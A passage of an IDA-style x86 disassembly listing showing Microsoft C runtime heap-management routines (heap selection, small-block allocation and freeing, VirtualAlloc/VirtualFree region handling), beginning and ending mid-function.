jmp loc_4188E4
; ---------------------------------------------------------------------------
loc_418991: ; CODE XREF: sub_4188A0+DD�j
cmp [ebp+var_8], ebx
jnz short loc_4189C4
mov [ebp+var_8], 1
and esi, 0FFFFBFFFh
jmp loc_4188E4
; ---------------------------------------------------------------------------
loc_4189A8: ; CODE XREF: sub_4188A0+D8�j
cmp [ebp+var_8], ebx
jnz short loc_4189C4
mov [ebp+var_8], 1
or esi, 4000h
jmp loc_4188E4
; ---------------------------------------------------------------------------
loc_4189BF: ; CODE XREF: sub_4188A0+D5�j
test ch, 0C0h
jz short loc_4189CB
loc_4189C4: ; CODE XREF: sub_4188A0+72�j
; sub_4188A0+7B�j ...
xor edx, edx
jmp loc_4188E4
; ---------------------------------------------------------------------------
loc_4189CB: ; CODE XREF: sub_4188A0+122�j
or ch, 80h
jmp loc_4188E4
; ---------------------------------------------------------------------------
loc_4189D3: ; CODE XREF: sub_4188A0+4A�j
; sub_4188A0+52�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_41DDF6
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_4189F1
loc_4189ED: ; CODE XREF: sub_4188A0+25�j
xor eax, eax
jmp short loc_418A0B
; ---------------------------------------------------------------------------
loc_4189F1: ; CODE XREF: sub_4188A0+14B�j
mov eax, [ebp+arg_C]
inc dword_46BCC8
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_418A0B: ; CODE XREF: sub_4188A0+14F�j
pop edi
pop esi
pop ebx
leave
retn
sub_4188A0 endp
; =============== S U B R O U T I N E =======================================
sub_418A10 proc near ; CODE XREF: sub_4159E8�p
mov edx, dword_46CE00
push ebx
push ebp
push esi
xor ebp, ebp
xor esi, esi
xor eax, eax
cmp edx, ebp
push edi
jle short loc_418A81
mov ebx, dword_46BDF8
mov edi, ebx
loc_418A2C: ; CODE XREF: sub_418A10+2E�j
mov ecx, [edi]
cmp ecx, ebp
jz short loc_418A47
test byte ptr [ecx+0Ch], 83h
jz short loc_418A42
inc eax
add edi, 4
cmp eax, edx
jl short loc_418A2C
jmp short loc_418A81
; ---------------------------------------------------------------------------
loc_418A42: ; CODE XREF: sub_418A10+26�j
mov esi, [ebx+eax*4]
jmp short loc_418A6B
; ---------------------------------------------------------------------------
loc_418A47: ; CODE XREF: sub_418A10+20�j
mov edi, eax
push 20h
shl edi, 2
call sub_415BE9
pop ecx
mov ecx, dword_46BDF8
mov [edi+ecx], eax
mov eax, dword_46BDF8
mov edi, [edi+eax]
cmp edi, ebp
jz short loc_418A81
mov esi, edi
loc_418A6B: ; CODE XREF: sub_418A10+35�j
cmp esi, ebp
jz short loc_418A81
or dword ptr [esi+10h], 0FFFFFFFFh
mov [esi+4], ebp
mov [esi+0Ch], ebp
mov [esi+8], ebp
mov [esi], ebp
mov [esi+1Ch], ebp
loc_418A81: ; CODE XREF: sub_418A10+12�j
; sub_418A10+30�j ...
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_418A10 endp
; =============== S U B R O U T I N E =======================================
sub_418A88 proc near ; CODE XREF: sub_415BFB+1F�p
; sub_41737F+126�p ...
arg_0 = dword ptr 4
mov eax, dword_46BB68
test eax, eax
jz short loc_418AA0
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_418AA0
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_418AA0: ; CODE XREF: sub_418A88+7�j
; sub_418A88+12�j
xor eax, eax
retn
sub_418A88 endp
; =============== S U B R O U T I N E =======================================
sub_418AA3 proc near ; CODE XREF: sub_418AD0+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call dword_4210C8 ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_418ACE
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_418ACE
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_418ACE: ; CODE XREF: sub_418AA3+15�j
; sub_418AA3+1C�j
pop esi
retn
sub_418AA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418AD0 proc near ; CODE XREF: sub_418C18+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_415B90
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call dword_42110C ; GetVersionExA
test eax, eax
jz short loc_418B13
cmp [ebp+var_88], 2
jnz short loc_418B13
cmp [ebp+var_94], 5
jb short loc_418B13
push 1
pop eax
jmp loc_418C15
; ---------------------------------------------------------------------------
loc_418B13: ; CODE XREF: sub_418AD0+27�j
; sub_418AD0+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call dword_421170 ; GetEnvironmentVariableA
test eax, eax
jz loc_418C02
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_418B55
loc_418B42: ; CODE XREF: sub_418AD0+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_418B50
cmp al, 7Ah
jg short loc_418B50
sub al, 20h
mov [ecx], al
loc_418B50: ; CODE XREF: sub_418AD0+76�j
; sub_418AD0+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_418B42
loc_418B55: ; CODE XREF: sub_418AD0+70�j
lea eax, [ebp+var_122C]
push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_416D70
add esp, 0Ch
test eax, eax
jnz short loc_418B77
lea eax, [ebp+var_122C]
jmp short loc_418BC0
; ---------------------------------------------------------------------------
loc_418B77: ; CODE XREF: sub_418AD0+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call dword_42107C ; GetModuleFileNameA
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_418BAB
loc_418B98: ; CODE XREF: sub_418AD0+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_418BA6
cmp al, 7Ah
jg short loc_418BA6
sub al, 20h
mov [ecx], al
loc_418BA6: ; CODE XREF: sub_418AD0+CC�j
; sub_418AD0+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_418B98
loc_418BAB: ; CODE XREF: sub_418AD0+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_4158E0
pop ecx
pop ecx
loc_418BC0: ; CODE XREF: sub_418AD0+A5�j
cmp eax, ebx
jz short loc_418C02
push 2Ch
push eax
call sub_416F20
pop ecx
cmp eax, ebx
pop ecx
jz short loc_418C02
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_418BE7
loc_418BD9: ; CODE XREF: sub_418AD0+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_418BE2
mov [ecx], bl
jmp short loc_418BE3
; ---------------------------------------------------------------------------
loc_418BE2: ; CODE XREF: sub_418AD0+10C�j
inc ecx
loc_418BE3: ; CODE XREF: sub_418AD0+110�j
cmp [ecx], bl
jnz short loc_418BD9
loc_418BE7: ; CODE XREF: sub_418AD0+107�j
push 0Ah
push ebx
push eax
call sub_416711
add esp, 0Ch
cmp eax, 2
jz short loc_418C15
cmp eax, 3
jz short loc_418C15
cmp eax, 1
jz short loc_418C15
loc_418C02: ; CODE XREF: sub_418AD0+5C�j
; sub_418AD0+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_418AA3
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_418C15: ; CODE XREF: sub_418AD0+3E�j
; sub_418AD0+126�j ...
pop ebx
leave
retn
sub_418AD0 endp
; =============== S U B R O U T I N E =======================================
sub_418C18 proc near ; CODE XREF: .text:00417B72�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_421178 ; HeapCreate
test eax, eax
mov dword_46D164, eax
jz short loc_418C6E
call sub_418AD0
cmp eax, 3
mov dword_46D168, eax
jnz short loc_418C54
push 3F8h
call sub_418C75
pop ecx
jmp short loc_418C5E
; ---------------------------------------------------------------------------
loc_418C54: ; CODE XREF: sub_418C18+2D�j
cmp eax, 2
jnz short loc_418C71
call sub_4197BC
loc_418C5E: ; CODE XREF: sub_418C18+3A�j
test eax, eax
jnz short loc_418C71
push dword_46D164
call dword_421174 ; HeapDestroy
loc_418C6E: ; CODE XREF: sub_418C18+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_418C71: ; CODE XREF: sub_418C18+3F�j
; sub_418C18+48�j
push 1
pop eax
retn
sub_418C18 endp
; =============== S U B R O U T I N E =======================================
sub_418C75 proc near ; CODE XREF: sub_418C18+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_46D164
call dword_42114C ; RtlAllocateHeap
test eax, eax
mov dword_46D15C, eax
jnz short loc_418C92
retn
; ---------------------------------------------------------------------------
loc_418C92: ; CODE XREF: sub_418C75+1A�j
mov ecx, [esp+arg_0]
and dword_46D154, 0
and dword_46D158, 0
push 1
mov dword_46D150, eax
mov dword_46D160, ecx
mov dword_46D148, 10h
pop eax
retn
sub_418C75 endp
; =============== S U B R O U T I N E =======================================
sub_418CBD proc near ; CODE XREF: sub_415C9B+17�p
; sub_41737F+4C�p ...
arg_0 = dword ptr 4
mov eax, dword_46D158
lea ecx, [eax+eax*4]
mov eax, dword_46D15C
lea ecx, [eax+ecx*4]
loc_418CCD: ; CODE XREF: sub_418CBD+26�j
cmp eax, ecx
jnb short loc_418CE5
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_418CE7
add eax, 14h
jmp short loc_418CCD
; ---------------------------------------------------------------------------
loc_418CE5: ; CODE XREF: sub_418CBD+12�j
xor eax, eax
locret_418CE7: ; CODE XREF: sub_418CBD+21�j
retn
sub_418CBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418CE8 proc near ; CODE XREF: sub_415C9B+23�p
; sub_41737F+A4�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
push ebx
push esi
mov esi, [ebp+arg_4]
mov eax, [ecx+10h]
push edi
mov edi, esi
add esi, 0FFFFFFFCh
sub edi, [ecx+0Ch]
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_41900C
mov edx, [ecx+esi]
lea ebx, [ecx+esi]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_418DBE
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_418D4C
push 3Fh
pop edx
loc_418D4C: ; CODE XREF: sub_418CE8+5F�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_418DA0
cmp edx, 20h
jnb short loc_418D77
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_418D98
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_418D98
; ---------------------------------------------------------------------------
loc_418D77: ; CODE XREF: sub_418CE8+6F�j
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_418D98
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_418D98: ; CODE XREF: sub_418CE8+86�j
; sub_418CE8+8D�j ...
mov ecx, [ebp+var_4]
mov ebx, [ebp+arg_4]
jmp short loc_418DA3
; ---------------------------------------------------------------------------
loc_418DA0: ; CODE XREF: sub_418CE8+6A�j
mov ecx, [ebp+var_4]
loc_418DA3: ; CODE XREF: sub_418CE8+B6�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
loc_418DBE: ; CODE XREF: sub_418CE8+56�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_418DCC
push 3Fh
pop edx
loc_418DCC: ; CODE XREF: sub_418CE8+DF�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_418E6F
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_418DF1
mov ebx, esi
loc_418DF1: ; CODE XREF: sub_418CE8+105�j
add ecx, [ebp+var_8]
mov edx, ecx
mov [ebp+var_4], ecx
sar edx, 4
dec edx
cmp edx, esi
jbe short loc_418E03
mov edx, esi
loc_418E03: ; CODE XREF: sub_418CE8+117�j
cmp ebx, edx
jz short loc_418E6A
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_418E52
cmp ebx, 20h
jnb short loc_418E33
mov esi, 80000000h
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_418E52
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_418E52
; ---------------------------------------------------------------------------
loc_418E33: ; CODE XREF: sub_418CE8+12D�j
lea ecx, [ebx-20h]
mov esi, 80000000h
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_418E52
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_418E52: ; CODE XREF: sub_418CE8+128�j
; sub_418CE8+142�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_418E6A: ; CODE XREF: sub_418CE8+11D�j
mov esi, [ebp+arg_4]
jmp short loc_418E72
; ---------------------------------------------------------------------------
loc_418E6F: ; CODE XREF: sub_418CE8+ED�j
mov ebx, [ebp+arg_0]
loc_418E72: ; CODE XREF: sub_418CE8+185�j
cmp [ebp+var_C], 0
jnz short loc_418E80
cmp ebx, edx
jz loc_418F01
loc_418E80: ; CODE XREF: sub_418CE8+18E�j
mov ecx, [ebp+var_10]
mov ebx, [ecx+edx*8+4]
lea ecx, [ecx+edx*8]
mov [esi+4], ebx
mov [esi+8], ecx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_418F01
mov cl, [edx+eax+4]
cmp edx, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edx+eax+4], cl
jnb short loc_418ED8
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_418EC7
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_418EC7: ; CODE XREF: sub_418CE8+1CF�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_418F01
; ---------------------------------------------------------------------------
loc_418ED8: ; CODE XREF: sub_418CE8+1C9�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_418EEE
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_418EEE: ; CODE XREF: sub_418CE8+1F4�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_418F01: ; CODE XREF: sub_418CE8+192�j
; sub_418CE8+1B7�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_41900C
mov eax, dword_46D154
test eax, eax
jz loc_418FFE
mov ecx, dword_46D14C
mov esi, dword_42117C
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push 4000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_46D14C
mov eax, dword_46D154
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_46D154
mov ecx, dword_46D14C
mov eax, [eax+10h]
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_46D154
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_46D154
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_418F8F
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_46D154
loc_418F8F: ; CODE XREF: sub_418CE8+29C�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_418FFE
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_46D154
push dword ptr [eax+10h]
push 0
push dword_46D164
call dword_421150 ; RtlFreeHeap
mov eax, dword_46D158
mov edx, dword_46D15C
lea eax, [eax+eax*4]
shl eax, 2
mov ecx, eax
mov eax, dword_46D154
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_416320
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_46D158
cmp eax, dword_46D154
jbe short loc_418FF4
sub [ebp+arg_0], 14h
loc_418FF4: ; CODE XREF: sub_418CE8+306�j
mov eax, dword_46D15C
mov dword_46D150, eax
loc_418FFE: ; CODE XREF: sub_418CE8+234�j
; sub_418CE8+2AB�j
mov eax, [ebp+arg_0]
mov dword_46D14C, edi
mov dword_46D154, eax
loc_41900C: ; CODE XREF: sub_418CE8+38�j
; sub_418CE8+227�j
pop edi
pop esi
pop ebx
leave
retn
sub_418CE8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419011 proc near ; CODE XREF: sub_415C27+18�p
; sub_41737F+77�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_46D158
mov edx, dword_46D15C
push ebx
push esi
lea eax, [eax+eax*4]
push edi
lea edi, [edx+eax*4]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
lea ecx, [eax+17h]
and ecx, 0FFFFFFF0h
mov [ebp+var_10], ecx
sar ecx, 4
dec ecx
cmp ecx, 20h
jge short loc_419051
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
mov [ebp+var_C], esi
jmp short loc_419061
; ---------------------------------------------------------------------------
loc_419051: ; CODE XREF: sub_419011+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_C], esi
mov [ebp+var_8], eax
loc_419061: ; CODE XREF: sub_419011+3E�j
mov eax, dword_46D150
mov ebx, eax
cmp ebx, edi
mov [ebp+arg_0], ebx
jnb short loc_419088
loc_41906F: ; CODE XREF: sub_419011+75�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_419088
add ebx, 14h
cmp ebx, [ebp+var_4]
mov [ebp+arg_0], ebx
jb short loc_41906F
loc_419088: ; CODE XREF: sub_419011+5C�j
; sub_419011+6A�j
cmp ebx, [ebp+var_4]
jnz short loc_419106
mov ebx, edx
loc_41908F: ; CODE XREF: sub_419011+96�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_4190AB
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4190A9
add ebx, 14h
jmp short loc_41908F
; ---------------------------------------------------------------------------
loc_4190A9: ; CODE XREF: sub_419011+91�j
cmp ebx, eax
loc_4190AB: ; CODE XREF: sub_419011+83�j
jnz short loc_419106
loc_4190AD: ; CODE XREF: sub_419011+AD�j
cmp ebx, [ebp+var_4]
jnb short loc_4190C3
cmp dword ptr [ebx+8], 0
jnz short loc_4190C0
add ebx, 14h
mov [ebp+arg_0], ebx
jmp short loc_4190AD
; ---------------------------------------------------------------------------
loc_4190C0: ; CODE XREF: sub_419011+A5�j
cmp ebx, [ebp+var_4]
loc_4190C3: ; CODE XREF: sub_419011+9F�j
jnz short loc_4190EB
mov ebx, edx
loc_4190C7: ; CODE XREF: sub_419011+C6�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jnb short loc_4190DB
cmp dword ptr [ebx+8], 0
jnz short loc_4190D9
add ebx, 14h
jmp short loc_4190C7
; ---------------------------------------------------------------------------
loc_4190D9: ; CODE XREF: sub_419011+C1�j
cmp ebx, eax
loc_4190DB: ; CODE XREF: sub_419011+BB�j
jnz short loc_4190EB
call sub_41931A
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4190FF
loc_4190EB: ; CODE XREF: sub_419011:loc_4190C3�j
; sub_419011:loc_4190DB�j
push ebx
call sub_4193CB
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_419106
loc_4190FF: ; CODE XREF: sub_419011+D8�j
xor eax, eax
jmp loc_419315
; ---------------------------------------------------------------------------
loc_419106: ; CODE XREF: sub_419011+7A�j
; sub_419011:loc_4190AB�j ...
mov dword_46D150, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41912D
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_419164
loc_41912D: ; CODE XREF: sub_419011+106�j
mov edx, [eax+0C4h]
mov esi, [eax+44h]
and edx, [ebp+var_8]
and esi, [ebp+var_C]
and [ebp+var_4], 0
lea ecx, [eax+44h]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_419161
loc_41914A: ; CODE XREF: sub_419011+14E�j
mov edx, [ecx+84h]
inc [ebp+var_4]
and edx, [ebp+var_8]
add ecx, 4
mov edi, esi
and edi, [ecx]
or edx, edi
jz short loc_41914A
loc_419161: ; CODE XREF: sub_419011+137�j
mov edx, [ebp+var_4]
loc_419164: ; CODE XREF: sub_419011+11A�j
mov ecx, edx
xor edi, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
and ecx, esi
jnz short loc_41918D
mov ecx, [eax+edx*4+0C4h]
push 20h
and ecx, [ebp+var_8]
pop edi
loc_41918D: ; CODE XREF: sub_419011+16D�j
; sub_419011+183�j
test ecx, ecx
jl short loc_419196
shl ecx, 1
inc edi
jmp short loc_41918D
; ---------------------------------------------------------------------------
loc_419196: ; CODE XREF: sub_419011+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_4191B3
push 3Fh
pop esi
loc_4191B3: ; CODE XREF: sub_419011+19D�j
cmp esi, edi
jz loc_4192C8
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_419224
cmp edi, 20h
jge short loc_4191F3
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_419221
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_419224
; ---------------------------------------------------------------------------
loc_4191F3: ; CODE XREF: sub_419011+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_419221
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_419224
; ---------------------------------------------------------------------------
loc_419221: ; CODE XREF: sub_419011+1D6�j
; sub_419011+203�j
mov ebx, [ebp+arg_0]
loc_419224: ; CODE XREF: sub_419011+1B0�j
; sub_419011+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_4192D4
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4192C5
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_419296
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_419284
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_419284: ; CODE XREF: sub_419011+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_4192C5
; ---------------------------------------------------------------------------
loc_419296: ; CODE XREF: sub_419011+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_4192AF
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_4192AF: ; CODE XREF: sub_419011+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_4192C5: ; CODE XREF: sub_419011+24E�j
; sub_419011+283�j
mov ecx, [ebp+var_8]
loc_4192C8: ; CODE XREF: sub_419011+1A4�j
test ecx, ecx
jz short loc_4192D7
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_4192D7
; ---------------------------------------------------------------------------
loc_4192D4: ; CODE XREF: sub_419011+229�j
mov ecx, [ebp+var_8]
loc_4192D7: ; CODE XREF: sub_419011+2B9�j
; sub_419011+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41930D
cmp ebx, dword_46D154
jnz short loc_41930D
mov ecx, [ebp+var_4]
cmp ecx, dword_46D14C
jnz short loc_41930D
and dword_46D154, 0
loc_41930D: ; CODE XREF: sub_419011+2E0�j
; sub_419011+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_419315: ; CODE XREF: sub_419011+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_419011 endp
; =============== S U B R O U T I N E =======================================
sub_41931A proc near ; CODE XREF: sub_419011+CC�p
mov eax, dword_46D158
mov ecx, dword_46D148
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41935D
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push dword_46D15C
push edi
push dword_46D164
call dword_421160 ; RtlReAllocateHeap
cmp eax, edi
jz short loc_4193AD
add dword_46D148, 10h
mov dword_46D15C, eax
mov eax, dword_46D158
loc_41935D: ; CODE XREF: sub_41931A+11�j
mov ecx, dword_46D15C
push 41C4h
push 8
lea eax, [eax+eax*4]
push dword_46D164
lea esi, [ecx+eax*4]
call dword_42114C ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_4193AD
push 4
push 2000h
push 100000h
push edi
call dword_421180 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_4193B1
push dword ptr [esi+10h]
push edi
push dword_46D164
call dword_421150 ; RtlFreeHeap
loc_4193AD: ; CODE XREF: sub_41931A+30�j
; sub_41931A+67�j
xor eax, eax
jmp short loc_4193C8
; ---------------------------------------------------------------------------
loc_4193B1: ; CODE XREF: sub_41931A+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_46D158
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_4193C8: ; CODE XREF: sub_41931A+95�j
pop edi
pop esi
retn
sub_41931A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4193CB proc near ; CODE XREF: sub_419011+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_4193DD: ; CODE XREF: sub_4193CB+19�j
test eax, eax
jl short loc_4193E6
shl eax, 1
inc ebx
jmp short loc_4193DD
; ---------------------------------------------------------------------------
loc_4193E6: ; CODE XREF: sub_4193CB+14�j
